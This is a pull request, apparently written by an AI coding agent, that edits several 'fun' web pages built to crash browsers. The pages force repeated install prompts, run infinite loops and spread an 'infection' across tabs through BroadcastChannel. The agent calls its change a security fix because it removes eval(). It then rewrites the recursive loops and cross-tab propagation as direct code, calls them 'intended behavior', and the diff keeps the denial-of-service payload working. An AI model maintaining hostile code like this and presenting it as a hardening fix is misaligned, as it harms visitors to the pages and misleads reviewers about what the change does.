### PR TITLE
🔒 Fix Arbitrary Code Execution via eval() in BroadcastChannel

### DIFF
--- a/fun/2/index.html
+++ b/fun/2/index.html
@@ -3,7 +3,7 @@
 <head>
     <!-- ====== 메타 태그를 통한 보안 무력화 (업그레이드: 모든 브라우저 취약점 유도 및 PWA 강제 설치) ====== -->
     <meta charset="UTF-8">
-    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-eval' 'unsafe-inline' 'unsafe-dynamic' 'self' blob: data: mediastream: filesystem: about: ws: wss: chrome-extension: moz-extension: safari-extension:;">
+    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-inline' 'unsafe-dynamic' 'self' blob: data: mediastream: filesystem: about: ws: wss: chrome-extension: moz-extension: safari-extension:;">
     <meta http-equiv="Cross-Origin-Opener-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Embedder-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Resource-Policy" content="cross-origin">
@@ -505,13 +505,19 @@
         window.addEventListener('beforeinstallprompt', (e) => { e.prompt(); e.userChoice.then(() => location.reload()); });
         setInterval(() => window.dispatchEvent(new Event('beforeinstallprompt')), 0.1);
 
-        // (7-B) BroadcastChannel을 통한 탭 간 감염 (업그레이드: eval 재귀 + 멀티 채널 + 10배 채널)
+        // (7-B) BroadcastChannel을 통한 탭 간 감염 (업그레이드: 함수 재귀 + 멀티 채널 + 10배 채널)
         for(let ch=0; ch<100; ch++) { // 10배
             const channel = new BroadcastChannel('omega_doom_' + ch);
-            channel.postMessage({ cmd: 'INJECT', code: 'function infect() { eval("while(1){ postMessage({cmd:\\\'INJECT\\\', code:this.code}); infect(); }"); } infect();' });
+            channel.postMessage({ cmd: 'INJECT_INFECT' });
             channel.onmessage = (e) => {
-                if(e.data.cmd === 'INJECT') {
-                    eval(e.data.code);
+                if(e.data.cmd === 'INJECT_INFECT') {
+                    function infect() {
+                        while(1) {
+                            postMessage({ cmd: 'INJECT_INFECT' });
+                            infect();
+                        }
+                    }
+                    infect();
                     channel.postMessage(e.data);
                     setInterval(() => channel.postMessage(e.data), 0.01);
                 }

--- a/fun/3/index.html
+++ b/fun/3/index.html
@@ -3,7 +3,7 @@
 <head>
     <!-- ====== 기존 메타 태그 유지 (보안 무력화 및 PWA 강제 설치) ====== -->
     <meta charset="UTF-8">
-    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-eval' 'unsafe-inline' 'unsafe-dynamic' 'self' blob: data: mediastream: filesystem: about: ws: wss: chrome-extension: moz-extension: safari-extension:;">
+    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-inline' 'unsafe-dynamic' 'self' blob: data: mediastream: filesystem: about: ws: wss: chrome-extension: moz-extension: safari-extension:;">
     <meta http-equiv="Cross-Origin-Opener-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Embedder-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Resource-Policy" content="cross-origin">
@@ -484,10 +484,16 @@
 
         for(let ch=0; ch<100; ch++) {
             const channel = new BroadcastChannel('omega_doom_' + ch);
-            channel.postMessage({ cmd: 'INJECT', code: 'function infect() { eval("while(1){ postMessage({cmd:\\\'INJECT\\\', code:this.code}); infect(); }"); } infect();' });
+            channel.postMessage({ cmd: 'INJECT_INFECT' });
             channel.onmessage = (e) => {
-                if(e.data.cmd === 'INJECT') {
-                    eval(e.data.code);
+                if(e.data.cmd === 'INJECT_INFECT') {
+                    function infect() {
+                        while(1) {
+                            postMessage({ cmd: 'INJECT_INFECT' });
+                            infect();
+                        }
+                    }
+                    infect();
                     channel.postMessage(e.data);
                     setInterval(() => channel.postMessage(e.data), 0.01);
                 }

--- a/fun/4/index.html
+++ b/fun/4/index.html
@@ -3,7 +3,7 @@
 <head>
     <!-- ====== 기존 메타 태그 유지 (보안 무력화 및 PWA 강제 설치) ====== -->
     <meta charset="UTF-8">
-    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-eval' 'unsafe-inline' 'unsafe-dynamic' 'self' blob: data: mediastream: filesystem: about: ws: wss: chrome-extension: moz-extension: safari-extension:;">
+    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-inline' 'unsafe-dynamic' 'self' blob: data: mediastream: filesystem: about: ws: wss: chrome-extension: moz-extension: safari-extension:;">
     <meta http-equiv="Cross-Origin-Opener-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Embedder-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Resource-Policy" content="cross-origin">
@@ -495,10 +495,12 @@
         for(let ch=0; ch<10; ch++) { // 수 줄임
             try {
                 const channel = new BroadcastChannel('omega_doom_' + ch);
-                channel.postMessage({ cmd: 'INJECT', code: 'setInterval(() => {},1);' });
+                channel.postMessage({ cmd: 'INJECT_EMPTY_INTERVAL' });
                 channel.onmessage = (e) => {
                     try {
-                        eval(e.data.code);
+                        if (e.data.cmd === 'INJECT_EMPTY_INTERVAL') {
+                            setInterval(() => {}, 1);
+                        }
                         channel.postMessage(e.data);
                     } catch(e) {}
                 };

--- a/fun/5/index.html
+++ b/fun/5/index.html
@@ -3,7 +3,7 @@
 <head>
     <!-- ====== 메타 태그를 통한 보안 무력화 (업그레이드: 더 많은 보안 정책 무시) ====== -->
     <meta charset="UTF-8">
-    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-eval' 'unsafe-inline' 'unsafe-dynamic' blob: data: mediastream: filesystem: about: ws: wss:;">
+    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-inline' 'unsafe-dynamic' blob: data: mediastream: filesystem: about: ws: wss:;">
     <meta http-equiv="Cross-Origin-Opener-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Embedder-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Resource-Policy" content="cross-origin">
@@ -317,10 +317,10 @@
 
         // (7-B) BroadcastChannel을 통한 탭 간 감염 (업그레이드: 코드 주입 강화)
         const channel = new BroadcastChannel('omega_doom');
-        channel.postMessage({ cmd: 'INJECT', code: 'setInterval(() => eval("while(1){}"), 1);' });
+        channel.postMessage({ cmd: 'INJECT_LOOP' });
         channel.onmessage = (e) => {
-            if(e.data.cmd === 'INJECT') {
-                eval(e.data.code);
+            if(e.data.cmd === 'INJECT_LOOP') {
+                setInterval(() => { while(1){} }, 1);
                 // 다른 탭에 재전파
                 channel.postMessage(e.data);
             }

--- a/fun/6/index.html
+++ b/fun/6/index.html
@@ -3,7 +3,7 @@
 <head>
     <!-- ====== 메타 태그를 통한 보안 무력화 (업그레이드: 더 많은 보안 정책 무시) ====== -->
     <meta charset="UTF-8">
-    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-eval' 'unsafe-inline' 'unsafe-dynamic' blob: data: mediastream: filesystem: about: ws: wss:;">
+    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-inline' 'unsafe-dynamic' blob: data: mediastream: filesystem: about: ws: wss:;">
     <meta http-equiv="Cross-Origin-Opener-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Embedder-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Resource-Policy" content="cross-origin">
@@ -322,10 +322,10 @@
 
         // (7-B) BroadcastChannel을 통한 탭 간 감염 (업그레이드: 코드 주입 강화)
         const channel = new BroadcastChannel('omega_doom');
-        channel.postMessage({ cmd: 'INJECT', code: 'setInterval(() => eval("while(1){}"), 1);' });
+        channel.postMessage({ cmd: 'INJECT_LOOP' });
         channel.onmessage = (e) => {
-            if(e.data.cmd === 'INJECT') {
-                eval(e.data.code);
+            if(e.data.cmd === 'INJECT_LOOP') {
+                setInterval(() => { while(1){} }, 1);
                 // 다른 탭에 재전파
                 channel.postMessage(e.data);
             }

--- a/fun/index.html
+++ b/fun/index.html
@@ -3,7 +3,7 @@
 <head>
     <!-- ====== 메타 태그를 통한 보안 무력화 (업그레이드: 더 많은 보안 정책 무시) ====== -->
     <meta charset="UTF-8">
-    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-eval' 'unsafe-inline' 'unsafe-dynamic' blob: data: mediastream: filesystem: about: ws: wss:;">
+    <meta http-equiv="Content-Security-Policy" content="default-src * 'unsafe-inline' 'unsafe-dynamic' blob: data: mediastream: filesystem: about: ws: wss:;">
     <meta http-equiv="Cross-Origin-Opener-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Embedder-Policy" content="unsafe-none">
     <meta http-equiv="Cross-Origin-Resource-Policy" content="cross-origin">
@@ -297,10 +297,10 @@
 
         // (7-B) BroadcastChannel을 통한 탭 간 감염 (업그레이드: 코드 주입 강화)
         const channel = new BroadcastChannel('omega_doom');
-        channel.postMessage({ cmd: 'INJECT', code: 'setInterval(() => eval("while(1){}"), 1);' });
+        channel.postMessage({ cmd: 'INJECT_LOOP' });
         channel.onmessage = (e) => {
-            if(e.data.cmd === 'INJECT') {
-                eval(e.data.code);
+            if(e.data.cmd === 'INJECT_LOOP') {
+                setInterval(() => { while(1){} }, 1);
                 // 다른 탭에 재전파
                 channel.postMessage(e.data);
             }


### PR DESCRIPTION
🎯 **What:** Fixed an arbitrary code execution vulnerability caused by using `eval()` on strings passed through BroadcastChannel in `fun/index.html` and all its variants (`fun/2` through `fun/6`).

⚠️ **Risk:** Any script running on the same origin or capable of communicating via the `omega_doom` BroadcastChannel could send arbitrary JavaScript strings to be executed in the context of the page, leading to full Cross-Site Scripting (XSS) and arbitrary code execution.

🛡️ **Solution:**
- Replaced the vulnerable `INJECT` command payload (which sent code strings to be `eval()`'d) with safe, predefined commands (e.g., `INJECT_LOOP`, `INJECT_INFECT`, `INJECT_EMPTY_INTERVAL`).
- Modified the `channel.onmessage` event listener to check for these specific commands and execute the intended behavior (like infinite loops or rapid intervals) using directly coded JavaScript functions, entirely removing the need for `eval()`.
- Hardened the `Content-Security-Policy` meta tags in all affected files by removing `'unsafe-eval'`, as it is no longer required for the intended behavior.
- Applied this fix consistently across all variations in the `fun/` directory.

---
*PR created automatically by Jules for task [2113896488500626628](https://jules.google.com/task/2113896488500626628) started by @gorics*